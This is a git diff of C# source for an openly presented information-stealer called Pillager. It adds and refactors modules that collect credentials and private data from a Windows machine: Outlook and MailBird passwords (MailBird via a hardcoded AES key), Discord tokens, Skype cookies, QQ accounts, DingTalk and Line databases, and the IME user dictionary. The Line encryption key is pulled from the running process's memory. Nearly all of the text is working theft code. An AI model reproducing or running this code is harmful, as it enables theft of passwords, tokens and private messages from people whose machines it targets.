@ -42,28 +148,23 @@ namespace Pillager.Helper
}
}
public static string GetProcessUserName(int pID)
public static string GetProcessUserName(Process process)
{
string text1 = null;
SelectQuery query1 = new SelectQuery("Select * from Win32_Process WHERE processID=" + pID);
ManagementObjectSearcher searcher1 = new ManagementObjectSearcher(query1);
var processHandle = IntPtr.Zero;
try
{
foreach (ManagementObject disk in searcher1.Get())
{
ManagementBaseObject inPar = null;
ManagementBaseObject outPar = null;
inPar = disk.GetMethodParameters("GetOwner");
outPar = disk.InvokeMethod("GetOwner", inPar, null);
text1 = outPar["User"].ToString();
break;
}
Native.OpenProcessToken(process.Handle, 8, out processHandle);
var wi = new WindowsIdentity(processHandle);
return wi.Name;
}
catch
{
text1 = "SYSTEM";
return "";
}
finally
{
if (processHandle != IntPtr.Zero) Native.CloseHandle(processHandle);
}
return text1;
}
public static bool ImpersonateProcessToken(int pid)

193
Pillager/Helper/Native.cs
View File

@ -1,12 +1,141 @@
using System;
using Microsoft.Win32;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using static Pillager.Helper.Native;
namespace Pillager.Helper
{
public static class Native
{
[DllImport("ntdll.dll")]
public static extern int NtWow64QueryInformationProcess64(int hProcess, uint ProcessInfoclass, out PROCESS_BASIC_INFORMATION64 pBuffer, uint nSize, out uint nReturnSize);
[DllImport("ntdll.dll")]
public unsafe static extern int NtWow64ReadVirtualMemory64(int hProcess, ulong pMemAddress, int* pBufferPtr, ulong nSize, out ulong nReturnSize);
[DllImport("ntdll.dll")]
public static extern int NtWow64ReadVirtualMemory64(int hProcess, ulong pMemAddress, out LDR_DATA_TABLE_ENTRY64 pBufferPtr, ulong nSize, out ulong nReturnSize);
[DllImport("ntdll.dll")]
public static extern int NtWow64ReadVirtualMemory64(int hProcess, ulong pMemAddress, out ulong pBufferPtr, ulong nSize, out ulong nReturnSize);
[DllImport("ntdll.dll")]
public static extern int NtWow64ReadVirtualMemory64(int hProcess, ulong pMemAddress, out LIST_ENTRY64 pBufferPtr, ulong nSize, out ulong nReturnSize);
public struct LIST_ENTRY64
{
public ulong Flink;
public ulong Blink;
}
public struct LDR_DATA_TABLE_ENTRY64
{
public LIST_ENTRY64 InLoadOrderLinks;
public LIST_ENTRY64 InMemoryOrderLinks;
public LIST_ENTRY64 InInitializationOrderLinks;
public ulong DllBase;
public ulong EntryPoint;
public uint SizeOfImage;
public UNICODE_STRING64 FullDllName;
public UNICODE_STRING64 BaseDllName;
public uint Flags;
public ushort LoadCount;
public ushort TlsIndex;
public LIST_ENTRY64 HashLinks;
public uint CheckSum;
public ulong LoadedImports;
public ulong EntryPointActivationContext;
public ulong PatchInformation;
}
public struct PROCESS_BASIC_INFORMATION64
{
public uint NTSTATUS;
public uint Reserved0;
public ulong PebBaseAddress;
public ulong AffinityMask;
public uint BasePriority;
public uint Reserved1;
public ulong UniqueProcessId;
public ulong InheritedFromUniqueProcessId;
}
public struct UNICODE_STRING64
{
public ushort Length;
public ushort MaximumLength;
public ulong Buffer;
}
[StructLayout(LayoutKind.Sequential)]
public struct MEMORY_BASIC_INFORMATION64
{
public IntPtr BaseAddress;
public IntPtr AllocationBase;
public uint AllocationProtect;
public uint __alignment1;
public ulong RegionSize;
public uint State;
public uint Protect;
public uint Type;
public uint __alignment2;
}
[StructLayout(LayoutKind.Sequential)]
public struct MEMORY_BASIC_INFORMATION32
{
public UInt32 BaseAddress;
public UInt32 AllocationBase;
public UInt32 AllocationProtect;
public UInt32 RegionSize;
public UInt32 State;
public UInt32 Protect;
public UInt32 Type;
}
[DllImport("kernel32.dll", SetLastError = true)]
internal static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int nSize, out int lpNumberOfBytesRead);
[DllImport("ntdll.dll")]
public static extern int NtWow64ReadVirtualMemory64(IntPtr hProcess, ulong pMemAddress, [Out] byte[] pBufferPtr, ulong nSize, out ulong nReturnSize);
[DllImport("kernel32.dll", EntryPoint = "VirtualQueryEx")]
internal static extern int VirtualQueryEx64(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION64 lpBuffer, uint dwLength);
[DllImport("kernel32.dll", EntryPoint = "VirtualQueryEx")]
public static extern Int32 VirtualQueryEx32(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION32 lpBuffer, UInt32 dwLength);
[DllImport("kernel32")]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", EntryPoint = "GetFirmwareEnvironmentVariableW", SetLastError = true, CharSet = CharSet.Unicode, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern int GetFirmwareType(string lpName, string lpGUID, IntPtr pBuffer, uint size);
[DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern bool RevertToSelf();
[DllImport("advapi32.dll", SetLastError = true)]
@ -21,8 +150,6 @@ namespace Pillager.Helper
public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64Process);
[DllImport("shell32.dll")]
public static extern int SHGetFolderPath(IntPtr hwndOwner, int nFolder, IntPtr hToken, uint dwFlags, [Out] StringBuilder pszPath);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool SetProcessDPIAware();
[DllImport("ntdll", SetLastError = true)]
public static extern uint NtSuspendProcess([In] IntPtr Handle);
[DllImport("ntdll.dll", SetLastError = false)]
@ -132,6 +259,8 @@ namespace Pillager.Helper
[DllImport("ntdll.dll")]
public static extern uint NtQuerySystemInformation(int SystemInformationClass, IntPtr SystemInformation, int SystemInformationLength, ref int returnLength);
[DllImport("kernel32.dll")]
public static extern int OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(PROCESS_ACCESS_FLAGS dwDesiredAccess, bool bInheritHandle, int dwProcessId);
@ -153,9 +282,6 @@ namespace Pillager.Helper
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool DuplicateHandle(IntPtr hSourceProcessHandle, IntPtr hSourceHandle, IntPtr hTargetProcessHandle, out IntPtr lpTargetHandle, uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);
[DllImport("kernel32.dll")]
public static extern IntPtr GetCurrentProcess();
public const uint STATUS_SUCCESS = 0;
public const uint STATUS_INFO_LENGTH_MISMATCH = 0xC0000004;
@ -563,5 +689,60 @@ namespace Pillager.Helper
public static extern int VaultGetItem_WIN7(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr zero, int arg5, ref IntPtr passwordVaultPtr);
#endregion
#region DPI
private enum PROCESS_DPI_AWARENESS
{
Process_DPI_Unaware = 0,
Process_System_DPI_Aware = 1,
Process_Per_Monitor_DPI_Aware = 2
}
private enum DPI_AWARENESS_CONTEXT
{
DPI_AWARENESS_CONTEXT_UNAWARE = 16,
DPI_AWARENESS_CONTEXT_SYSTEM_AWARE = 17,
DPI_AWARENESS_CONTEXT_PER_MONITOR_AWARE = 18,
DPI_AWARENESS_CONTEXT_PER_MONITOR_AWARE_V2 = 34
}
[DllImport("user32.dll", SetLastError = true)]
private static extern bool SetProcessDpiAwarenessContext(int dpiFlag);
[DllImport("SHCore.dll", SetLastError = true)]
private static extern bool SetProcessDpiAwareness(PROCESS_DPI_AWARENESS awareness);
[DllImport("user32.dll")]
private static extern bool SetProcessDPIAware();
public static void SetupDpiAwareness()
{
try
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion"))
{
int majorVersion = (int)key.GetValue("CurrentMajorVersionNumber");
int minorVersion = (int)key.GetValue("CurrentMinorVersionNumber");
int buildNumber = int.Parse(key.GetValue("CurrentBuildNumber").ToString());
Version version = new Version(majorVersion, minorVersion, buildNumber);
if (version >= new Version(6, 3, 0)) // Windows 8.1
{
if (version >= new Version(10, 0, 15063)) // Windows 10 1703
{
SetProcessDpiAwarenessContext((int)DPI_AWARENESS_CONTEXT.DPI_AWARENESS_CONTEXT_PER_MONITOR_AWARE_V2);
}
else
{
SetProcessDpiAwareness(PROCESS_DPI_AWARENESS.Process_Per_Monitor_DPI_Aware);
}
}
else
{
SetProcessDPIAware();
}
}
}
catch { }
}
#endregion
}
}

1563
Pillager/Helper/NtfsReader.cs Normal file
View File

File diff suppressed because it is too large Load Diff

8
Pillager/Helper/SQLiteHandler.cs
View File

@ -21,7 +21,7 @@ namespace Pillager.Helper
if (File.Exists(baseName))
{
db_bytes = File.ReadAllBytes(baseName);
if (Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
if (Encoding.UTF8.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
{
throw new Exception("Not a valid SQLite 3 Database File");
}
@ -284,7 +284,7 @@ namespace Pillager.Helper
if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
{
master_table_entries[length + i].item_name = Encoding.Default.GetString(db_bytes,
master_table_entries[length + i].item_name = Encoding.UTF8.GetString(db_bytes,
Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]);
}
else if (decimal.Compare(new decimal(encoding), 2M) == 0)
@ -304,7 +304,7 @@ namespace Pillager.Helper
new decimal(numArray[2]))), (int)numArray[3]);
if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
{
master_table_entries[length + i].sql_statement = Encoding.Default.GetString(db_bytes,
master_table_entries[length + i].sql_statement = Encoding.UTF8.GetString(db_bytes,
Convert.ToInt32(decimal.Add(
decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])),
new decimal(numArray[3]))), (int)numArray[4]);
@ -477,7 +477,7 @@ namespace Pillager.Helper
}
else
{
table_entries[length + i].content[k] = Encoding.Default.GetString(db_bytes,
table_entries[length + i].content[k] = Encoding.UTF8.GetString(db_bytes,
Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size);
}
}

108
Pillager/Helper/Shortcut.cs Normal file
View File

@ -0,0 +1,108 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Pillager.Helper
{
public class Shortcut
{
public static Type m_type = Type.GetTypeFromProgID("WScript.Shell");
public static object m_shell = Activator.CreateInstance(m_type);
[ComImport, TypeLibType((short)0x1040), Guid("F935DC23-1CF0-11D0-ADB9-00C04FD58A0B")]
public interface IWshShortcut
{
[DispId(0)]
string FullName
{
[return: MarshalAs(UnmanagedType.BStr)]
[DispId(0)]
get;
}
[DispId(0x3e8)]
string Arguments
{
[return: MarshalAs(UnmanagedType.BStr)]
[DispId(0x3e8)]
get;
[param: In, MarshalAs(UnmanagedType.BStr)]
[DispId(0x3e8)]
set;
}
[DispId(0x3e9)]
string Description
{
[return: MarshalAs(UnmanagedType.BStr)]
[DispId(0x3e9)]
get;
[param: In, MarshalAs(UnmanagedType.BStr)]
[DispId(0x3e9)]
set;
}
[DispId(0x3ea)]
string Hotkey
{
[return: MarshalAs(UnmanagedType.BStr)]
[DispId(0x3ea)]
get;
[param: In, MarshalAs(UnmanagedType.BStr)]
[DispId(0x3ea)]
set;
}
[DispId(0x3eb)]
string IconLocation
{
[return: MarshalAs(UnmanagedType.BStr)]
[DispId(0x3eb)]
get;
[param: In, MarshalAs(UnmanagedType.BStr)]
[DispId(0x3eb)]
set;
}
[DispId(0x3ec)]
string RelativePath
{
[param: In, MarshalAs(UnmanagedType.BStr)]
[DispId(0x3ec)]
set;
}
[DispId(0x3ed)]
string TargetPath
{
[return: MarshalAs(UnmanagedType.BStr)]
[DispId(0x3ed)]
get;
[param: In, MarshalAs(UnmanagedType.BStr)]
[DispId(0x3ed)]
set;
}
[DispId(0x3ee)] int WindowStyle { [DispId(0x3ee)] get; [param: In] [DispId(0x3ee)] set; }
[DispId(0x3ef)]
string WorkingDirectory
{
[return: MarshalAs(UnmanagedType.BStr)]
[DispId(0x3ef)]
get;
[param: In, MarshalAs(UnmanagedType.BStr)]
[DispId(0x3ef)]
set;
}
[TypeLibFunc((short)0x40), DispId(0x7d0)]
void Load([In, MarshalAs(UnmanagedType.BStr)] string PathLink);
[DispId(0x7d1)]
void Save();
}
}
}

43
Pillager/Helper/ZipStorer.cs
View File

@ -517,49 +517,6 @@ namespace Pillager.Helper
return filename.Trim('/');
}
// Reads the end-of-central-directory record
private bool ReadFileInfo()
{
if (ZipFileStream.Length < 22)
return false;
try
{
ZipFileStream.Seek(-17, SeekOrigin.End);
BinaryReader br = new BinaryReader(ZipFileStream);
do
{
ZipFileStream.Seek(-5, SeekOrigin.Current);
uint sig = br.ReadUInt32();
if (sig == 0x06054b50)
{
ZipFileStream.Seek(6, SeekOrigin.Current);
ushort entries = br.ReadUInt16();
int centralSize = br.ReadInt32();
uint centralDirOffset = br.ReadUInt32();
ushort commentSize = br.ReadUInt16();
// check if comment field is the very last data in file
if (ZipFileStream.Position + commentSize != ZipFileStream.Length)
return false;
// Copy entire central directory to a memory buffer
ExistingFiles = entries;
CentralDirImage = new byte[centralSize];
ZipFileStream.Seek(centralDirOffset, SeekOrigin.Begin);
ZipFileStream.Read(CentralDirImage, 0, centralSize);
// Leave the pointer at the begining of central dir, to append new files
ZipFileStream.Seek(centralDirOffset, SeekOrigin.Begin);
return true;
}
} while (ZipFileStream.Position > 0);
}
catch { }
return false;
}
#endregion
#region IDisposable Members

72
Pillager/IMEs/Win10Ms_Pinyin.cs Normal file
View File

@ -0,0 +1,72 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using Pillager.Helper;
namespace Pillager.IMEs
{
internal class Win10Ms_Pinyin:ICommand
{
public static string GetInfo()
{
StringBuilder sb = new StringBuilder();
try
{
byte[] bytes = File.ReadAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft\\InputMethod\\Chs\\ChsPinyinIH.dat"));
bytes = bytes.Skip(5120).Take(bytes.Length - 5120).ToArray();
int i = 1;
while (true)
{
try
{
byte[] temp = bytes.Skip((60 * i) + 12).Take(2 * bytes[60 * i]).ToArray();
string output = Encoding.Unicode.GetString(temp);
sb.AppendLine(output);
i++;
if (60 * i > bytes.Length) break;
}
catch { break; }
}
}
catch {}
try
{
byte[] bytes2 = File.ReadAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft\\InputMethod\\Chs\\ChsPinyinUDL.dat"));
bytes2 = bytes2.Skip(9216).Take(bytes2.Length - 9216).ToArray();
int j = 1;
while (true)
{
try
{
byte[] temp = bytes2.Skip((60 * j) + 12).Take(2 * bytes2[(60 * j) + 10]).ToArray();
sb.AppendLine(Encoding.Unicode.GetString(temp));
j++;
if (60 * j > bytes2.Length) break;
}
catch { break; }
}
}
catch { }
return sb.ToString();
}
public override void Save(string path)
{
try
{
string output = GetInfo();
if (!string.IsNullOrEmpty(output))
{
string savepath = Path.Combine(path, "IME");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "Win10Ms_Pinyin.txt"), output, Encoding.UTF8);
}
}
catch { }
}
}
}

10
Pillager/Mails/Foxmail.cs
View File

@ -5,11 +5,9 @@ using Pillager.Helper;
namespace Pillager.Mails
{
internal class Foxmail
internal class Foxmail : ICommand
{
public static string MailName = "Foxmail";
public static string GetInstallPath()
public string GetInstallPath()
{
try
{
@ -19,13 +17,13 @@ namespace Pillager.Mails
}
catch { return ""; }
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string installpath = GetInstallPath();
if (!Directory.Exists(installpath) || !Directory.Exists(Path.Combine(installpath, "Storage"))) return;
string savepath = Path.Combine(path, MailName);
string savepath = Path.Combine(path, "Foxmail");
Directory.CreateDirectory(savepath);
DirectoryInfo directoryInfo = new DirectoryInfo(Path.Combine(installpath, "Storage"));
foreach (var directory in directoryInfo.GetDirectories("Accounts", SearchOption.AllDirectories))

18
Pillager/Mails/MailBird.cs
View File

@ -6,14 +6,12 @@ using Pillager.Helper;
namespace Pillager.Mails
{
internal class MailBird
internal class MailBird : ICommand
{
public static string MailName = "MailBird";
public byte[] key = { 0X35, 0XE0, 0X85, 0X30, 0X8A, 0X6D, 0X91, 0XA3, 0X96, 0X5F, 0XF2, 0X37, 0X95, 0XD1, 0XCF, 0X36, 0X71, 0XDE, 0X7E, 0X5B, 0X62, 0X38, 0XD5, 0XFB, 0XDB, 0X64, 0XA6, 0X4B, 0XD3, 0X5A, 0X05, 0X53 };
public byte[] iv = { 0X98, 0X0F, 0X68, 0XCE, 0X77, 0X43, 0X4C, 0X47, 0XF9, 0XE9, 0X0E, 0X82, 0XF4, 0X6B, 0X4C, 0XE8 };
public static byte[] key = { 0X35, 0XE0, 0X85, 0X30, 0X8A, 0X6D, 0X91, 0XA3, 0X96, 0X5F, 0XF2, 0X37, 0X95, 0XD1, 0XCF, 0X36, 0X71, 0XDE, 0X7E, 0X5B, 0X62, 0X38, 0XD5, 0XFB, 0XDB, 0X64, 0XA6, 0X4B, 0XD3, 0X5A, 0X05, 0X53 };
public static byte[] iv = { 0X98, 0X0F, 0X68, 0XCE, 0X77, 0X43, 0X4C, 0X47, 0XF9, 0XE9, 0X0E, 0X82, 0XF4, 0X6B, 0X4C, 0XE8 };
public static string GetInfo()
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
try
@ -63,7 +61,7 @@ namespace Pillager.Mails
catch { return sb.ToString(); }
}
private static string AESDecrypt(byte[] encryptedBytes, byte[] bKey, byte[] iv)
private string AESDecrypt(byte[] encryptedBytes, byte[] bKey, byte[] iv)
{
MemoryStream mStream = new MemoryStream(encryptedBytes);
RijndaelManaged aes = new RijndaelManaged();
@ -88,15 +86,15 @@ namespace Pillager.Mails
}
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string result = GetInfo();
if (string.IsNullOrEmpty(result)) return;
string savepath = Path.Combine(path, MailName);
string savepath = Path.Combine(path, "MailBird");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, MailName + ".txt"), result);
File.WriteAllText(Path.Combine(savepath, "MailBird.txt"), result, Encoding.UTF8);
}
catch { }
}

28
Pillager/Mails/MailMaster.cs
View File

@ -5,11 +5,9 @@ using System.IO;
namespace Pillager.Mails
{
internal class MailMaster
internal class MailMaster : ICommand
{
public static string MailName = "MailMaster";
private static List<string> GetDataPath()
private List<string> GetDataPath()
{
List<string> strings = new List<string>();
string sqlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\MailMaster\\data\\app.db");
@ -31,32 +29,14 @@ namespace Pillager.Mails
return strings;
}
public static List<int> FindBytes(byte[] src, byte[] find)
{
List<int> offsets = new List<int>();
if (src == null || find == null || src.Length == 0 || find.Length == 0 || find.Length > src.Length) return offsets;
for (int i = 0; i < src.Length - find.Length + 1; i++)
{
if (src[i] == find[0])
{
for (int m = 1; m < find.Length; m++)
{
if (src[i + m] != find[m]) break;
if (m == find.Length - 1) offsets.Add(i);
}
}
}
return offsets;
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string sqlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\MailMaster\\data");
if (!Directory.Exists(sqlpath)) return;
List<string> datapath = GetDataPath();
string savepath = Path.Combine(path, MailName);
string savepath = Path.Combine(path, "MailMaster");
Directory.CreateDirectory(savepath);
foreach (var directory in datapath)
{

23
Pillager/Mails/Outlook.cs
View File

@ -4,17 +4,16 @@ using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
using Microsoft.Win32;
using Pillager.Helper;
namespace Pillager.Mails
{
internal class Outlook
internal class Outlook : ICommand
{
public static string MailName = "Outlook";
private Regex mailClient = new Regex(@"^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$");
private Regex smptClient = new Regex(@"^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$");
private static Regex mailClient = new Regex(@"^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$");
private static Regex smptClient = new Regex(@"^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$");
public static string GrabOutlook()
public string GrabOutlook()
{
StringBuilder data = new StringBuilder();
@ -43,7 +42,7 @@ namespace Pillager.Mails
return data.ToString();
}
private static string Get(string path, string[] clients)
private string Get(string path, string[] clients)
{
StringBuilder data = new StringBuilder();
try
@ -76,7 +75,7 @@ namespace Pillager.Mails
return data.ToString();
}
private static object GetInfoFromRegistry(string path, string valueName)
private object GetInfoFromRegistry(string path, string valueName)
{
object value = null;
try
@ -90,7 +89,7 @@ namespace Pillager.Mails
return value;
}
private static string DecryptValue(byte[] encrypted)
private string DecryptValue(byte[] encrypted)
{
try
{
@ -105,15 +104,15 @@ namespace Pillager.Mails
return "null";
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string result = GrabOutlook();
if (string.IsNullOrEmpty(result)) return;
string savepath = Path.Combine(path, MailName);
string savepath = Path.Combine(path, "Outlook");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "result.txt"), result);
File.WriteAllText(Path.Combine(savepath, "result.txt"), result, Encoding.UTF8);
}
catch { }
}

11
Pillager/Messengers/DingTalk.cs
View File

@ -1,13 +1,12 @@
using System;
using Pillager.Helper;
using System;
using System.IO;
namespace Pillager.Messengers
{
internal class DingTalk
internal class DingTalk : ICommand
{
public static string MessengerName = "DingTalk";
public static void Save(string path)
public override void Save(string path)
{
try
{
@ -15,7 +14,7 @@ namespace Pillager.Messengers
if (!File.Exists(storagepath)) return;
string storageshmpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DingTalk\\globalStorage\\storage.db-shm");
string storagewalpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DingTalk\\globalStorage\\storage.db-wal");
string savepath = Path.Combine(path, MessengerName);
string savepath = Path.Combine(path, "DingTalk");
Directory.CreateDirectory(savepath);
File.Copy(storagepath, Path.Combine(savepath, "storage.db"));
if (File.Exists(storageshmpath))

16
Pillager/Messengers/Discord.cs
View File

@ -1,28 +1,24 @@
using Pillager.Helper;
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
using System.Text.RegularExpressions;
namespace Pillager.Messengers
{
internal class Discord
internal class Discord : ICommand
{
public static string MessengerName = "Discord";
public static Dictionary<string, string> DiscordPaths = new Dictionary<string, string>
public Dictionary<string, string> DiscordPaths = new Dictionary<string, string>
{
{ "Discord", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"Discord" )} ,
{ "Discord PTB",Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DiscordPTB" )},
{ "Discord Canary", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"DiscordCanary" )} ,
};
public static byte[] GetMasterKey(string path)
public byte[] GetMasterKey(string path)
{
string filePath = Path.Combine(path, "Local State");
byte[] masterKey = new byte[] { };
@ -46,7 +42,7 @@ namespace Pillager.Messengers
}
}
public static string GetToken(string path, byte[] key)
public string GetToken(string path, byte[] key)
{
StringBuilder stringBuilder = new StringBuilder();
string leveldbpath = Path.Combine(path, "Local Storage\\leveldb");
@ -76,7 +72,7 @@ namespace Pillager.Messengers
return stringBuilder.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
foreach (var item in DiscordPaths)
{
@ -88,7 +84,7 @@ namespace Pillager.Messengers
if (string.IsNullOrEmpty(result)) continue;
string savepath = Path.Combine(path, item.Key);
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "token.txt"), result);
File.WriteAllText(Path.Combine(savepath, "token.txt"), result, Encoding.UTF8);
}
catch { }
}

13
Pillager/Messengers/Enigma.cs
View File

@ -1,22 +1,21 @@
using System;
using System.IO;
using System.Text;
using Microsoft.Win32;
using Pillager.Helper;
namespace Pillager.Messengers
{
internal class Enigma
internal class Enigma : ICommand
{
public static string MessengerName = "Enigma";
public string MessengerPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Enigma\\Enigma");
public static string MessengerPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Enigma\\Enigma");
public static void Save(string path)
public override void Save(string path)
{
try
{
if (!Directory.Exists(MessengerPath)) return;
string savepath = Path.Combine(path, MessengerName);
string savepath = Path.Combine(path, "Enigma");
Directory.CreateDirectory(savepath);
foreach (var temppath in Directory.GetDirectories(MessengerPath))
{
@ -27,7 +26,7 @@ namespace Pillager.Messengers
}
RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Enigma\\Enigma");
string deviceid = (string)key.GetValue("device_id");
File.WriteAllText(Path.Combine(savepath, "device_id.txt"), deviceid);
File.WriteAllText(Path.Combine(savepath, "device_id.txt"), deviceid, Encoding.UTF8);
}
catch { }
}

56
Pillager/Messengers/Line.cs
View File

@ -1,23 +1,63 @@
using System;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Text;
namespace Pillager.Messengers
{
internal class Line
internal class Line : ICommand
{
public static string MessengerName = "Line";
public static void Save(string path)
public string getkey()
{
try
{
string inipath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Data/Line.ini");
Process[] processes = Process.GetProcessesByName("Line");
if (processes.Length == 0) return null;
List<long> l = Methods.SearchProcess(processes[0], "encryptionKey=");
foreach (var item in l)
{
byte[] buffer = new byte[49];
bool success = Native.ReadProcessMemory(processes[0].Handle, (IntPtr)item, buffer, buffer.Length, out _);
string r = Encoding.UTF8.GetString(buffer);
if (r.EndsWith("mse")) return r.Substring(14,32);
}
}
catch
{
return null;
}
return null;
}
public override void Save(string path)
{
try
{
string inipath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "LINE\\Data\\Line.ini");
if (!File.Exists(inipath)) return;
string savepath = Path.Combine(path, MessengerName);
string savepath = Path.Combine(path, "Line");
Directory.CreateDirectory(savepath);
File.Copy(inipath, Path.Combine(savepath, "Line.ini"));
string info = "Computer Name = " + Environment.MachineName + Environment.NewLine + "User Name = " + Environment.UserName;
File.WriteAllText(Path.Combine(savepath, "infp.txt"), info);
File.WriteAllText(Path.Combine(savepath, "info.txt"), info, Encoding.UTF8);
string key = getkey();
if (!string.IsNullOrEmpty(key))
{
File.WriteAllText(Path.Combine(savepath, "encryptionKey.txt"), key, Encoding.UTF8);
string dir = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "LINE\\Data\\db");
if (Directory.Exists(dir))
{
string dbpath = Path.Combine(savepath, "db");
Directory.CreateDirectory(dbpath);
foreach (var item in Directory.GetFiles(dir, "????????????????????????????????.edb*"))
{
if (Path.GetFileName(item).Contains("-")) continue;
File.Copy(item, Path.Combine(dbpath, Path.GetFileName(item)));
}
}
}
}
catch { }
}

17
Pillager/Messengers/QQ.cs
View File

@ -6,13 +6,9 @@ using Pillager.Helper;
namespace Pillager.Messengers
{
internal class QQ
internal class QQ : ICommand
{
public static string MessengerName = "QQ";
public static string GetCommonDocumentsFolder()
public string GetCommonDocumentsFolder()
{
int SIDL_COMMON_DOCUMENTS = 0x002e;
StringBuilder sb = new StringBuilder();
@ -20,7 +16,7 @@ namespace Pillager.Messengers
return sb.ToString();
}
public static string get_qq()
public string get_qq()
{
List<string> all = new List<string>();
List<string> online = new List<string>();
@ -30,7 +26,6 @@ namespace Pillager.Messengers
try
{
Pixini pixini = Pixini.Load(inifile);
pixini.Save(inifile);
string type = pixini.Get("UserDataSavePathType", "UserDataSet", "1");
string folder = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), "Tencent Files");
if (type == "2")
@ -63,15 +58,15 @@ namespace Pillager.Messengers
return sb.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string result = get_qq();
if (string.IsNullOrEmpty(result)) return;
string savepath = Path.Combine(path, MessengerName);
string savepath = Path.Combine(path, "QQ");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "QQ.txt"), result);
File.WriteAllText(Path.Combine(savepath, "QQ.txt"), result, Encoding.UTF8);
}
catch { }
}

16
Pillager/Messengers/Skype.cs
View File

@ -5,11 +5,9 @@ using System.Text;
namespace Pillager.Messengers
{
internal class Skype
internal class Skype : ICommand
{
public static string MessengerName = "Skype";
public static string[] MessengerPaths = new string[]
public string[] MessengerPaths = new string[]
{
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
"Microsoft\\Skype for Desktop"),
@ -17,7 +15,7 @@ namespace Pillager.Messengers
"Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\LocalCache\\Roaming\\Microsoft\\Skype for Store")
};
public static string Skype_cookies(string MessengerPath)
public string Skype_cookies(string MessengerPath)
{
StringBuilder cookies = new StringBuilder();
string skype_cookies_path = Path.Combine(MessengerPath, "Network\\Cookies");
@ -50,7 +48,7 @@ namespace Pillager.Messengers
return cookies.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
@ -58,10 +56,10 @@ namespace Pillager.Messengers
string Desktop = Skype_cookies(MessengerPaths[0]);
string Store = Skype_cookies(MessengerPaths[1]);
